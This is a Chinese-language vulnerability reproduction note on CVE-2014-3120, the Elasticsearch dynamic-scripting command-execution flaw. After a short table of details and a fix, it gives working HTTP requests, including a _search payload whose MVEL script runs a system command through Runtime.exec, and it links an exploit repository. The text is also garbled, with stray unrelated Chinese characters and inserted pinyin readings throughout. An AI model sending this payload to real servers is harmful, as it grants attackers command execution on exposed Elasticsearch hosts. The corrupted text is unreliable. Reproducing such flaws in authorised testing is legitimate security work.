漏洞編號(hào):CVE-2014-3120
漏洞詳情
| CVE編號(hào) | CVE-2014-3120 | 漏洞級(jí)別 | 中危6.8 |
|---|---|---|---|
| 標(biāo)題 | Elasticsearch默認(rèn)配置允許動(dòng)態(tài)腳本執(zhí)行漏洞 | 披露時(shí)間 | 2014/07/29 |
| 漏洞總結(jié) | Elasticsearch 1.2版本及之前的默認(rèn)配置啟用了動(dòng)態(tài)腳本飒焦,攻擊者可以通過_search的source參數(shù)執(zhí)行任意MVEL表達(dá)式和Java代碼哑舒。需要注意的是絮宁,只有在用戶沒有在獨(dú)立的虛擬機(jī)中運(yùn)行Elasticsearch時(shí)畔濒,這才違反了供應(yīng)商的安全策略瞬沦。 | ||
| 利用路徑 | NETWORK | 利用難度 | 一般8.6 |
| 影響產(chǎn)品 | elasticsearch | ||
| 解決方案 | 升級(jí)Elasticsearch到1.2.1以上版本,或禁用動(dòng)態(tài)腳本功能理肺。建議將Elasticsearch運(yùn)行在一個(gè)獨(dú)立的虛擬機(jī)中乃摹,以增強(qiáng)安全性免糕。 |
漏洞復(fù)現(xiàn)
添加一條數(shù)據(jù)
POST /website/blog/ HTTP/1.1
Host: 0.0.0.0:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
{
"name": "phithon"
}
執(zhí)行命令
POST /_search?pretty HTTP/1.1
Host: 0.0.0.0:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\"id\\").getInputStream()).useDelimiter(\\"\\\\\\\\A\\").next();"
}
}
}
POC&EXP
github:POC-EXP/ElasticSearch 命令執(zhí)行漏洞 at main · twsec-pro/POC-EXP (github.com)
yakit:cc5908ae-5ea5-4060-8f15-1da729b3fb8c
2.gif
